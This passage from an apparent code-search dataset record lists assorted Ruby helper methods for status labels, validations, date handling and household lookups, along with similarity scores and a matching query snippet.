"def support(ibel)\n return ibel.payment_mode unless ibel.payment_mode =~ /(bank|cash)_\\d+/\n vals = ibel.payment_mode.split('_')\n case vals[0]\n when 'bank' then BankAccount.find(vals[1]).nickname\n when 'cash' then 'Caisse ' + Cash.find(vals[1]).nickname\n else \n ''\n end\n end",
"def s_status(s_language)\n s_out=breakdancemake_s_bdmservice_status_by_PATH_only_t1(s_language)\n return s_out\n end",
"def milestone_class_for_state(param, check, match_blank_param = false)\n if match_blank_param\n 'active' if param.blank? || param == check\n elsif param == check\n 'active'\n else\n check\n end\n end",
"def branch(group:nil)\n case group\n when :remote\n flag = \"-r\"\n when :all\n flag = \"-a\"\n when nil, :local\n flag = \"\"\n end\n\n `git branch #{flag}`.lines.map do |line|\n fields = line.split\n\n if fields.first['*']\n fields[1].strip\n else\n fields.first.strip\n end\n end\nend",
"def current_status\n status ? 'Active' : 'Inactive'\n end",
"def marital_status; end",
"def repository_label(value)\n identifier =\n if value.is_a?(Symbol)\n value\n elsif (v = value.to_s.downcase).include?('solr')\n :solr\n elsif v.include?('ebsco') || v.include?('eds')\n :eds\n end\n case identifier\n when :solr then 'Solr'\n when :eds then 'EBSCO EDS'\n else \"Unknown (#{value})\"\n end\n end",
"def service_status_mode(mode = :local)\n if mode == :local\n debug \"Choose local status for Pacemaker service '#{name}' on node '#{hostname}'\"\n get_primitive_puppet_status name, hostname\n elsif mode == :global\n debug \"Choose global status for Pacemaker service '#{name}'\"\n get_primitive_puppet_status name\n else\n fail \"Unknown service status mode '#{mode}'\"\n end\n end",
"def humanize_status\n case role_filling_status\n when 'ccm'\n 'CCM'\n when 'non_ccm'\n 'Nicht-CCM'\n when 'substitute'\n 'Vertretung'\n else\n 'Error: enum symbol is invalid'\n end\n end",
"def branch_name\n @branch_name ||= (0...19).map { (65 + rand(26)).chr }.join.downcase\n end",
"def status_label_organization(organization)\n case organization.status\n when 'waiting_approval'\n content_tag(:div, 'pending approval', class: 'label label-warning')\n when 'active'\n content_tag(:div, 'active', class: 'label label-success')\n else\n content_tag(:div, 'archived', class: 'label label-danger')\n end\n end",
"def service_company\n self.well_info.service_company\n end",
"def determine_status\n sent = invoice.email_status == \"EmailSent\"\n balance = invoice.balance.to_f\n\n if balance == 0\n \"Paid\"\n elsif check_due_date(invoice.due_date)\n sent ? \"Overdue Sent\" : \"Overdue\"\n elsif balance > 0 && balance < invoice.total\n sent ? \"Partial Sent\" : \"Partial\"\n elsif balance == invoice.total\n sent ? \"Open Sent\" : \"Open\"\n end\n end",
"def status_label\n absentee? || uocava? ? 'Absentee Status' : 'Voter Status'\n end"
] | [
"0.7212287",
"0.7156464",
"0.6361214",
"0.619933",
"0.60374534",
"0.5984082",
"0.5964916",
"0.59352756",
"0.59222555",
"0.59166205",
"0.5904862",
"0.5904862",
"0.5887707",
"0.5879764",
"0.5865017",
"0.584003",
"0.5736813",
"0.5725427",
"0.56407464",
"0.5610731",
"0.5597073",
"0.55727446",
"0.55322295",
"0.5504616",
"0.54920286",
"0.5483302",
"0.5476279",
"0.5472134",
"0.54619515",
"0.5439903",
"0.5439903",
"0.5436047",
"0.5425356",
"0.54020196",
"0.54015464",
"0.5392687",
"0.53842735",
"0.5374913",
"0.53723246",
"0.53723246",
"0.5363293",
"0.53501326",
"0.5349408",
"0.5338343",
"0.53331107",
"0.533074",
"0.5313166",
"0.5310053",
"0.5308703",
"0.5308582",
"0.5308526",
"0.5302721",
"0.5302356",
"0.5290624",
"0.5284249",
"0.5279743",
"0.52778983",
"0.52773416",
"0.5265983",
"0.52610344",
"0.525738",
"0.52571404",
"0.52567506",
"0.5245043",
"0.52426285",
"0.5241183",
"0.52357674",
"0.5235335",
"0.52345395",
"0.52175176",
"0.52148026",
"0.52056676",
"0.52040136",
"0.51993704",
"0.51919127",
"0.519121",
"0.51901615",
"0.5183428",
"0.5176713",
"0.5172012",
"0.51696026",
"0.5169422",
"0.5169082",
"0.5165484",
"0.51582754",
"0.51446486",
"0.51412255",
"0.51400036",
"0.5131997",
"0.5126146",
"0.51159066",
"0.5114875",
"0.5109219",
"0.51085824",
"0.5097725",
"0.5090696",
"0.5084768",
"0.5079623",
"0.50784343",
"0.5070068"
] | 0.8002263 | 0 |
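For reference, a minimal usage sketch of convert_to_service_component from the record above. This is plain Ruby against the document as written; the branch strings are illustrative inputs, not values drawn from the dataset:

    convert_to_service_component('Army Reserves')      # => 'Reserves'
    convert_to_service_component('Air National Guard') # => 'National Guard'
    convert_to_service_component('Navy')               # => 'Active'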
def all_mandatory_attributes_are_present?
  result = true
  if params[:characteristic_type] == 'work'
    if params[:client_characteristic]['start_date(1i)'].present? && params[:client_characteristic]['start_date(2i)'].present?
      sd_month = params[:client_characteristic]['start_date(2i)'].to_i
      sd_day = 1
      params[:client_characteristic]['start_date(3i)'].to_i
      sd_year = params[:client_characteristic]['start_date(1i)'].to_i
      params[:client_characteristic][:start_date] = Date.civil(sd_year,sd_month,sd_day)
    else
      result = false
    end
    if params[:client_characteristic]['end_date(1i)'].present? || params[:client_characteristic]['end_date(2i)'].present?
      if params[:client_characteristic]['end_date(1i)'].present? && params[:client_characteristic]['end_date(2i)'].present?
        sd_month = params[:client_characteristic]['end_date(2i)'].to_i
        sd_day = 1
        params[:client_characteristic]['end_date(3i)'].to_i
        sd_year = params[:client_characteristic]['end_date(1i)'].to_i
        end_date = Date.civil(sd_year,sd_month,sd_day)
        params[:client_characteristic][:end_date] = end_date.end_of_month
      else
        result = false | def set_hoh_data()
li_member_id = params[:household_member_id].to_i
@household_member = HouseholdMember.find(li_member_id)
@household = Household.find(@household_member.household_id)
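    # note: @household is assigned but not read again in this method; it presumably
    # feeds the view (the commented-out head-of-household lookup below used it)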
# @head_of_household_name = HouseholdMember.get_hoh_name(@household.id)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def mandatory_work_characteristic(arg_pgu_adults_collection,arg_week_start_date,arg_week_end_date)\n mandatory_characteristic_present = false\n if arg_pgu_adults_collection\n\t arg_pgu_adults_collection.each do |each_client|\n\t\t mandatory_characteristic = ClientCharacteristic.has_mandatory_work_characteristic_in_a_given_date_range(each_client.id,arg_week_start_date,arg_week_end_date)\n\t\t\tif mandatory_characteristic.present?\n\t\t\t mandatory_characteristic_present = true\n\t\t\t break\n\t\t\tend\n\t end\n else\n #no adults present\n end\n return mandatory_characteristic_present\nend",
"def check_attributes\n if (@values == nil)\n puts \"Specify necessary informations: \"\n get_input_values\n @additions = Array.new()\n end\n #check_time_string\n end",
"def valid_attributes\n { \"amount\"=>1245.to_s, 'book_id'=>@od.to_param,\n \"narration\"=>'Premier virement', \"date\"=>Date.today.to_formatted_s('%d-%m-%Y'),\n :compta_lines_attributes=>{'0'=>{account_id:@ba.to_param}, '1'=>{account_id:@bb.to_param}}\n }\n end",
"def validate_required\n [\n :project_name,\n :status,\n :requester_id,\n :subject_expert_id,\n :sponsor_id,\n :vision,\n :goal,\n :description,\n :scope,\n :advice_required,\n :program_id,\n :train_id,\n :funding_method,\n :cost_center,\n :funding_status,\n :budget_allocated,\n :priority,\n :start_date,\n :end_date,\n :risk_rating,\n :risks,\n :projected_revenue,\n ].each do |field|\n if self.attributes[field.to_s].nil? || self.attributes[field.to_s].blank?\n # intentionally vague!\n add_validation 'All fields are required to perform further validations'\n return false\n end\n end\n true\n end",
"def valid_attributes\n {\n start_date: Date.new(2013, 01, 20),\n end_date: Date.new(2013, 02, 20),\n onsite: false,\n name: \"Early Competitor\",\n registrant_type: \"competitor\",\n expense_item_attributes: {\n cost: @comp_exp.cost,\n tax: @comp_exp.tax\n }\n }\n end",
"def mandatory_case_details?\n claim.court && claim.case_number && claim.supplier_number\n end",
"def valid?\n return false if @summary.nil?\n return false if @summary.to_s.length > 100\n record_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\"])\n return false unless record_type_validator.valid?(@record_type)\n return false if !@wbs_code.nil? && @wbs_code.to_s.length > 50\n return false if @company.nil?\n return false if !@site_name.nil? && @site_name.to_s.length > 50\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state_identifier.nil? && @state_identifier.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@contact_phone_number.nil? && @contact_phone_number.to_s.length > 20\n return false if !@contact_phone_extension.nil? && @contact_phone_extension.to_s.length > 15\n return false if !@contact_email_address.nil? && @contact_email_address.to_s.length > 250\n severity_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless severity_validator.valid?(@severity)\n impact_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless impact_validator.valid?(@impact)\n return false if !@external_x_ref.nil? && @external_x_ref.to_s.length > 100\n return false if !@po_number.nil? && @po_number.to_s.length > 50\n return false if !@automatic_email_cc.nil? && @automatic_email_cc.to_s.length > 1000\n sub_billing_method_validator = EnumAttributeValidator.new('String', [\"ActualRates\", \"FixedFee\", \"NotToExceed\", \"OverrideRate\"])\n return false unless sub_billing_method_validator.valid?(@sub_billing_method)\n knowledge_base_link_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\", \"KnowledgeBaseArticle\", \"Time\", \"Activity\"])\n return false unless knowledge_base_link_type_validator.valid?(@knowledge_base_link_type)\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n predecessor_type_validator = EnumAttributeValidator.new('String', [\"Ticket\", \"Phase\"])\n return false unless predecessor_type_validator.valid?(@predecessor_type)\n return true\n end",
"def dates_valid?\n date_check(params[:start_date]) && date_check(params[:end_date]) && dates_sequential?\n end",
"def valid_attributes\n { \n \"name\" => \"Dummy Sale\",\n \"description\"=>\"Dummy event description data\", \n \"start_date\"=> Time.zone.now.strftime(\"%Y/%m/%d %H:%M:%S %z\"), \n \"end_date\"=> (Time.zone.now+2.months).strftime(\"%Y/%m/%d %H:%M:%S %z\"), \n \"permalink\" => taxon.permalink,\n \"eventable_type\"=> taxon.class.to_s,\n \"eventable_id\" => taxon.id.to_s,\n \"is_active\"=>\"1\", \n \"is_hidden\"=>\"0\", \n \"is_permanent\"=>\"0\"\n }\n end",
"def valid_attributes\n {\n completed: false,\n cancelled: false,\n transaction_id: nil,\n completed_date: Date.new(2012, 1, 30)\n }\n end",
"def date_not_selected(attributes)\n puts attributes\n #puts attributes[\"date(1i)\"].to_i\n #puts attributes[\"date(2i)\"].to_i\n #puts attributes[\"date(3i)\"].to_i\n\n if attributes[\"date(1i)\"].to_i != 0 && attributes[\"date(2i)\"].to_i !=0 &&attributes[\"date(3i)\"].to_i !=0 && attributes[\"date(4i)\"].to_i !=0 && attributes[\"date(5i)\"].to_i !=0\n return false\n else\n return true\n end\n end",
"def mandatory_case_details?\n claim.court && claim.case_number && claim.external_user\n end",
"def process_claim_start_and_end_dates(c,date_qualifier)\n if date_qualifier == \"434\" or date_qualifier == \"472\"\n service_dates = c[1].split(\"-\")\n @claim_information[\"claim_statement_period_start_date\"] = service_dates[0].to_s if @claim_information.claim_statement_period_start_date.nil?\n @claim_information[\"claim_statement_period_end_date\"] = service_dates.length == 2 ? service_dates[1].to_s : service_dates[0].to_s if @claim_information.claim_statement_period_end_date.nil?\n elsif date_qualifier == \"435\" or date_qualifier == \"096\"\n if date_qualifier == \"435\"\n @claim_information[\"claim_statement_period_start_date\"] = c[1] if @claim_information.claim_statement_period_start_date.nil?\n @service_from_date = @claim_information.claim_statement_period_start_date\n else\n @claim_information[\"claim_statement_period_end_date\"] = c[1] if @claim_information.claim_statement_period_end_date.nil?\n @service_to_date = @claim_information.claim_statement_period_end_date\n end\n end\n end",
"def validate_required_attributes\n required = %i[currency_code direction epic force_open guaranteed_stop order_type size\n time_in_force]\n\n required.each do |attribute|\n raise ArgumentError, \"#{attribute} attribute must be set\" if attributes[attribute].nil?\n end\n end",
"def valid?\n return false if !@date_from.nil? && @date_from.to_s.length > 10\n return false if !@date_from.nil? && @date_from.to_s.length < 10\n return false if !@date_to.nil? && @date_to.to_s.length > 10\n return false if !@date_to.nil? && @date_to.to_s.length < 10\n return false if !@request_next_item_key.nil? && @request_next_item_key.to_s.length > 24\n return false if !@request_next_item_key.nil? && @request_next_item_key.to_s.length < 1\n return false if !@request_transfer_class.nil? && @request_transfer_class.to_s.length > 1\n return false if !@request_transfer_class.nil? && @request_transfer_class.to_s.length < 1\n return false if !@request_transfer_term.nil? && @request_transfer_term.to_s.length > 1\n return false if !@request_transfer_term.nil? && @request_transfer_term.to_s.length < 1\n return false if !@next_item_key.nil? && @next_item_key.to_s.length > 24\n return false if !@next_item_key.nil? && @next_item_key.to_s.length < 1\n true\n end",
"def has_fields_for_ride?\n user.present? &&\n from_address.present? &&\n from_city.present? &&\n from_latitude.present? &&\n from_longitude.present? &&\n pickup_at.present?\n end",
"def design_data_filled_in?\n !self.description.blank? && \n !self.platform.blank? && \n !self.product_type.blank? && \n !self.project.blank? &&\n !self.design_directory.blank? &&\n !self.incoming_directory.blank?\n end",
"def validate_essential_attributes #:nodoc:\n if @month.to_i.zero? || @year.to_i.zero?\n errors.add :month, \"is required\" if @month.to_i.zero?\n errors.add :year, \"is required\" if @year.to_i.zero?\n else\n errors.add :month, \"is not a valid month\" unless valid_month?(@month)\n errors.add 'card', \"has expired\" if expired?\n errors.add :year, \"is not a valid year\" unless valid_expiry_year?(@year)\n end\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"asset.DeviceContractInformation\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"asset.DeviceContractInformation\"])\n return false unless object_type_validator.valid?(@object_type)\n contract_status_validator = EnumAttributeValidator.new('String', [\"Unknown\", \"Not Covered\", \"Active\", \"Expiring Soon\"])\n return false unless contract_status_validator.valid?(@contract_status)\n contract_status_reason_validator = EnumAttributeValidator.new('String', [\"\", \"Line Item Expired\", \"Line Item Terminated\"])\n return false unless contract_status_reason_validator.valid?(@contract_status_reason)\n device_type_validator = EnumAttributeValidator.new('String', [\"None\", \"CiscoUcsServer\", \"CiscoUcsFI\", \"CiscoUcsChassis\", \"CiscoNexusSwitch\"])\n return false unless device_type_validator.valid?(@device_type)\n platform_type_validator = EnumAttributeValidator.new('String', [\"\", \"APIC\", \"DCNM\", \"UCSFI\", \"UCSFIISM\", \"IMC\", \"IMCM4\", \"IMCM5\", \"IMCRack\", \"UCSIOM\", \"HX\", \"HyperFlexAP\", \"IWE\", \"UCSD\", \"IntersightAppliance\", \"IntersightAssist\", \"PureStorageFlashArray\", \"UCSC890\", \"NetAppOntap\", \"NetAppActiveIqUnifiedManager\", \"EmcScaleIo\", \"EmcVmax\", \"EmcVplex\", \"EmcXtremIo\", \"VmwareVcenter\", \"MicrosoftHyperV\", \"AppDynamics\", \"Dynatrace\", \"NewRelic\", \"ServiceNow\", \"ReadHatOpenStack\", \"CloudFoundry\", \"MicrosoftAzureApplicationInsights\", \"OpenStack\", \"MicrosoftSqlServer\", \"Kubernetes\", \"AmazonWebService\", \"AmazonWebServiceBilling\", \"MicrosoftAzureServicePrincipal\", \"MicrosoftAzureEnterpriseAgreement\", \"DellCompellent\", \"HPE3Par\", \"RedHatEnterpriseVirtualization\", \"NutanixAcropolis\", \"HPEOneView\", \"ServiceEngine\", \"HitachiVirtualStoragePlatform\", \"IMCBlade\", \"TerraformCloud\", \"TerraformAgent\", \"CustomTarget\", \"AnsibleEndpoint\", \"HTTPEndpoint\", \"SSHEndpoint\", \"CiscoCatalyst\"])\n return false unless platform_type_validator.valid?(@platform_type)\n state_contract_validator = EnumAttributeValidator.new('String', [\"Update\", \"OK\", \"Failed\", \"Retry\"])\n return false unless state_contract_validator.valid?(@state_contract)\n true\n end",
"def validate\n # perform presence related validations here\n # result object is returned\n service_params_list = ServicesBase.get_service_params(self.class.to_s)\n missing_mandatory_params = []\n service_params_list[:mandatory].each do |mandatory_param|\n missing_mandatory_params << \"missing_#{mandatory_param}\" if @params[mandatory_param].to_s.blank?\n end if service_params_list[:mandatory].present?\n\n return error_with_identifier('mandatory_params_missing',\n 'sb_1',\n missing_mandatory_params\n ) if missing_mandatory_params.any?\n\n success\n end",
"def valid?\n return false if @accounts_date.nil?\n return false if @reporting_period.nil?\n return false if @currency.nil?\n return false if @consolidated_accounts.nil?\n return false if @audit_qualification.nil?\n return false if @number_of_employees.nil?\n return false if @turnover.nil?\n return false if @cost_of_sales.nil?\n return false if @sga_plus_other_net_costs.nil?\n return false if @operating_profit.nil?\n return false if @interest_receivable.nil?\n return false if @interest_payable.nil?\n return false if @pre_tax_profit.nil?\n return false if @taxation.nil?\n return false if @post_tax_profit.nil?\n return false if @dividends_payable.nil?\n return false if @retained_profits.nil?\n return false if @intangible_assets.nil?\n return false if @tangible_assets.nil?\n return false if @investments_and_other_assets.nil?\n return false if @fixed_assets.nil?\n return false if @stock.nil?\n return false if @trade_debtors.nil?\n return false if @other_debtors.nil?\n return false if @miscellaneous_current_assets.nil?\n return false if @cash.nil?\n return false if @current_assets.nil?\n return false if @total_assets.nil?\n return false if @bank_loans_and_overdrafts.nil?\n return false if @trade_creditors.nil?\n return false if @miscellaneous_current_liabilities.nil?\n return false if @other_short_term_finances.nil?\n return false if @current_liabilities.nil?\n return false if @contingent_liabilities.nil?\n return false if @other_long_term_finances.nil?\n return false if @total_long_term_liabilities.nil?\n return false if @total_liabilities.nil?\n return false if @net_assets.nil?\n return false if @equity_paid_up.nil?\n return false if @revaluation_reserve.nil?\n return false if @sundry_reserves.nil?\n return false if @profit_and_loss_account_reserve.nil?\n return false if @shareholder_funds.nil?\n return false if @depreciation.nil?\n return false if @amortisation_of_intangibles.nil?\n return false if @ebitda.nil?\n return false if @working_capital.nil?\n return false if @capital_employed.nil?\n return false if @wages_and_salaries.nil?\n return false if @directors_emoluments.nil?\n return false if @audit_fees.nil?\n return false if @bank_overdraft_and_long_term_loans.nil?\n return false if @net_cash_flow_from_operations.nil?\n return false if @net_cash_flow_before_financing.nil?\n return false if @net_cash_flow_from_financing.nil?\n return false if @increase_in_cash.nil?\n return false if @debtor_days.nil?\n return false if @exports.nil?\n return false if @gross_margin_percentage.nil?\n return false if @operating_profit_margin_percentage.nil?\n return false if @ebitda_margin_percentage.nil?\n return false if @pre_tax_profit_margin_percentage.nil?\n return false if @net_margin_percentage.nil?\n return false if @return_on_assets_percentage.nil?\n return false if @return_on_capital_employed_percentage.nil?\n return false if @return_on_equity.nil?\n return false if @current_ratio.nil?\n return false if @cash_to_current_liabilities_ratio.nil?\n return false if @cash_to_total_assets_percentage.nil?\n return false if @liquidity_ratio.nil?\n return false if @gearing_percentage_on_liability_basis.nil?\n return false if @gearing_percentage_on_gross_debt_basis.nil?\n return false if @gearing_percentage_on_net_debt_basis.nil?\n return false if @debt_to_capital_percentage.nil?\n return false if @inventory_turnover_ratio.nil?\n return false if @cash_to_turnover_percentage.nil?\n return false if @days_inventory_outstanding.nil?\n return false if @days_sales_outstanding.nil?\n return false if 
@days_payable_outstanding.nil?\n return false if @cash_conversion_cycle.nil?\n return false if @revenue_per_employee.nil?\n return false if @human_capital_value_added.nil?\n return false if @interest_coverage_ratio.nil?\n return false if @net_debt_to_ebitda_ratio.nil?\n return false if @cfo_to_sales_ratio.nil?\n return false if @auditor.nil?\n return false if @joint_auditor.nil?\n return false if @solicitor.nil?\n return false if @accountant.nil?\n return true\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 25\n return false if @based_on.nil?\n based_on_validator = EnumAttributeValidator.new('String', [\"MyCalendar\", \"Customer\", \"AllHours\", \"Custom\"])\n return false unless based_on_validator.valid?(@based_on)\n return false if !@application_order.nil? && @application_order > 32767\n return false if !@application_order.nil? && @application_order < 1\n return false if !@respond_hours.nil? && @respond_hours > 999\n return false if !@respond_hours.nil? && @respond_hours < 0\n return false if !@respond_percent.nil? && @respond_percent > 99999\n return false if !@respond_percent.nil? && @respond_percent < 0\n return false if !@plan_within.nil? && @plan_within > 999\n return false if !@plan_within.nil? && @plan_within < 0\n return false if !@plan_within_percent.nil? && @plan_within_percent > 99999\n return false if !@plan_within_percent.nil? && @plan_within_percent < 0\n return false if !@resolution_hours.nil? && @resolution_hours > 999\n return false if !@resolution_hours.nil? && @resolution_hours < 0\n return false if !@resolution_percent.nil? && @resolution_percent > 99999\n return false if !@resolution_percent.nil? && @resolution_percent < 0\n return true\n end",
"def valid?\n type_validator = EnumAttributeValidator.new('String', [\"person\", \"business\"])\n return false unless type_validator.valid?(@type)\n return false if @country.nil?\n return false if @street.nil?\n return false if @postal_code.nil?\n return false if @city.nil?\n return false if @email.nil?\n return false if @ip.nil?\n identification_type_validator = EnumAttributeValidator.new('String', [\"DL\", \"PP\", \"ID\", \"OT\"])\n return false unless identification_type_validator.valid?(@identification_type)\n legal_entity_type_validator = EnumAttributeValidator.new('String', [\"sole_proprietorship\", \"partnership\", \"privately_owned_company\", \"publicly_owned_company\", \"government_owned_entity\", \"trust\", \"ngo\", \"club_and_society\", \"go\", \"other\", \"financial_institution\", \"mto\"])\n return false unless legal_entity_type_validator.valid?(@legal_entity_type)\n nature_of_business_validator = EnumAttributeValidator.new('String', [\"personal\", \"agriculture_and_hunting\", \"forestry\", \"fishing\", \"agricultural_by_products\", \"coal_mining\", \"oil_mining\", \"iron_ore_mining\", \"other_metal_and_diamond_mining\", \"other_mineral_mining\", \"manufacturing_of_food_drink_tobacco\", \"manufacturing_of_textiles_leather_fur_furniture\", \"manufacture_of_wooden_products_furniture\", \"manufacture_of_paper_pulp_allied_products\", \"manufacture_of_chemicals_medical_petroleum_rubber_plastic_products\", \"manufacture_of_pottery_china_glass_stone\", \"manufacture_of_iron_steel_non_ferrous_metals_basic_industries\", \"manufacture_of_metal_products_electrical_and_scientific_engineering\", \"manufacture_of_jewelry_musical_instruments_toys\", \"electricity_gas_and_water\", \"construction\", \"wholesale_trade\", \"retail_trade\", \"catering_incl_hotels\", \"transport_storage\", \"communications\", \"finance_and_holding_companies\", \"insurance\", \"business_services\", \"real_estate_development_investment\", \"central_state_governments\", \"community_services_defence_police_prisons_etc\", \"social_services_education_health_care\", \"personal_services_leisure_services\", \"personal_services_domestic_laundry_repairs\", \"personal_services_embassies_international_organisations\"])\n return false unless nature_of_business_validator.valid?(@nature_of_business)\n return false if @documents.nil?\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\", \"O\"])\n return false unless gender_validator.valid?(@gender)\n true\n end",
"def valid?\n return false if !@external_id.nil? && @external_id.to_s.length > 64\n return false if !@first_name.nil? && @first_name.to_s.length > 128\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 64\n return false if @last_name.to_s.length < 1\n return false if !@middle_name.nil? && @middle_name.to_s.length > 64\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\"])\n return false unless gender_validator.valid?(@gender)\n return false if !@language.nil? && @language.to_s.length > 32\n return false if !@phone.nil? && @phone.to_s.length > 64\n return false if !@email.nil? && @email.to_s.length > 128\n return false if !@doc_type.nil? && @doc_type.to_s.length > 32\n return false if !@doc_issuer_info.nil? && @doc_issuer_info.to_s.length > 256\n return false if !@doc_series.nil? && @doc_series.to_s.length > 64\n return false if !@doc_number.nil? && @doc_number.to_s.length > 64\n return false if !@department_code.nil? && @department_code.to_s.length > 64\n return false if !@department_name.nil? && @department_name.to_s.length > 256\n return false if !@building_no.nil? && @building_no.to_s.length > 8\n return false if !@city.nil? && @city.to_s.length > 32\n return false if !@country_code.nil? && @country_code.to_s.length > 8\n return false if !@country_name.nil? && @country_name.to_s.length > 64\n return false if !@district.nil? && @district.to_s.length > 64\n return false if !@flat_no.nil? && @flat_no.to_s.length > 8\n return false if !@house_no.nil? && @house_no.to_s.length > 16\n return false if !@region.nil? && @region.to_s.length > 64\n return false if !@room_no.nil? && @room_no.to_s.length > 8\n return false if !@settlement_type.nil? && @settlement_type.to_s.length > 32\n return false if !@street.nil? && @street.to_s.length > 64\n return false if !@raw_address.nil? && @raw_address.to_s.length > 512\n true\n end",
"def only_some_attributes_filled?(ar)\n ar.attributes_filled < AppConfig['contact_info.complete_percentage'].to_f\n end",
"def valid?\n return false if @handle.nil?\n return false if @customer.nil?\n return false if @plan.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"active\", \"expired\", \"on_hold\", \"pending\"])\n return false unless state_validator.valid?(@state)\n return false if @test.nil?\n return false if @quantity.nil?\n return false if @timezone.nil?\n return false if @created.nil?\n return false if @renewing.nil?\n return false if @plan_version.nil?\n return false if @start_date.nil?\n return false if @is_cancelled.nil?\n return false if @in_trial.nil?\n return false if @has_started.nil?\n return false if @renewal_count.nil?\n return false if @renewal_count < 0\n expire_reason_validator = EnumAttributeValidator.new('String', [\"dunning\", \"cancelled\", \"ondemand\", \"fixed\"])\n return false unless expire_reason_validator.valid?(@expire_reason)\n on_hold_reason_validator = EnumAttributeValidator.new('String', [\"dunning\", \"ondemand\"])\n return false unless on_hold_reason_validator.valid?(@on_hold_reason)\n return false if @payment_method_added.nil?\n return false if @reminder_email_sent.nil?\n return false if @failed_invoices.nil?\n return false if @failed_amount.nil?\n return false if @cancelled_invoices.nil?\n return false if @cancelled_amount.nil?\n return false if @pending_invoices.nil?\n return false if @pending_amount.nil?\n return false if @dunning_invoices.nil?\n return false if @dunning_amount.nil?\n return false if @settled_invoices.nil?\n return false if @settled_amount.nil?\n return false if @refunded_amount.nil?\n return false if @pending_additional_costs.nil?\n return false if @pending_additional_cost_amount.nil?\n return false if @transferred_additional_costs.nil?\n return false if @transferred_additional_cost_amount.nil?\n return false if @pending_credits.nil?\n return false if @pending_credit_amount.nil?\n return false if @transferred_credits.nil?\n return false if @transferred_credit_amount.nil?\n return false if @hosted_page_links.nil?\n return true\n end",
"def valid?(json: {})\n json.present? && json[:license_ref].present? && json[:start_date].present?\n end",
"def verify_nilness_params(yearly_cost, yearly_consumption, floor_space, heat_type, water_cooking_type, nb_residents)\n if yearly_cost.zero? # if he forgot the yearly cost\n false\n else\n if yearly_consumption.zero? # if the consumption is not entered, all the other field must be present\n if [floor_space, nb_residents].include?(0) || [heat_type, water_cooking_type].include?('')\n false\n else\n true\n end\n else\n true\n end\n end\n end",
"def required_params_present?\n\n render json: {error: 'Missing required parameter: result'},\n status: :bad_request and return false unless params[:result]\n\n render json: {error: 'Missing required parameter: result.result_type'},\n status: :bad_request and return false unless params[:result][:result_type]\n\n # Manual Results are required to provide the execution id.\n # All other results are required to provide the project_id\n if params['result']['result_type'] == 'manual'\n render json: {error: 'Missing required parameter: result.execution_id'},\n status: :bad_request and return false unless params[:result][:execution_id]\n else\n render json: {error: 'Missing required parameter: result.project_id'},\n status: :bad_request and return false unless params[:result][:project_id]\n end\n\n\n render json: {error: 'Missing required parameter: result.testcase_id'},\n status: :bad_request and return false unless params[:result][:testcase_id]\n\n render json: {error: 'Missing required parameter: result.environment_id'},\n status: :bad_request and return false unless params[:result][:environment_id]\n\n\n render json: {error: 'Missing required parameter: result.status'},\n status: :bad_request and return false unless params[:result][:status]\n\n true\n end",
"def valid?\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 25\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @status.nil?\n return false if @type.nil?\n return false if @address_line1.nil?\n return false if @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@phone_number.nil? && @phone_number.to_s.length > 30\n return false if !@fax_number.nil? && @fax_number.to_s.length > 30\n return false if !@website.nil? && @website.to_s.length > 255\n return false if !@account_number.nil? && @account_number.to_s.length > 100\n return false if !@lead_source.nil? && @lead_source.to_s.length > 50\n return false if !@user_defined_field1.nil? && @user_defined_field1.to_s.length > 50\n return false if !@user_defined_field2.nil? && @user_defined_field2.to_s.length > 50\n return false if !@user_defined_field3.nil? && @user_defined_field3.to_s.length > 50\n return false if !@user_defined_field4.nil? && @user_defined_field4.to_s.length > 50\n return false if !@user_defined_field5.nil? && @user_defined_field5.to_s.length > 50\n return false if !@user_defined_field6.nil? && @user_defined_field6.to_s.length > 50\n return false if !@user_defined_field7.nil? && @user_defined_field7.to_s.length > 50\n return false if !@user_defined_field8.nil? && @user_defined_field8.to_s.length > 50\n return false if !@user_defined_field9.nil? && @user_defined_field9.to_s.length > 50\n return false if !@user_defined_field10.nil? && @user_defined_field10.to_s.length > 50\n return true\n end",
"def determine_date\n if !params[:date_start].blank? && !params[:date_end].blank?\n @date_start = params[:date_start]\n @date_end = params[:date_end]\n else\n determine_date_now\n end\n end",
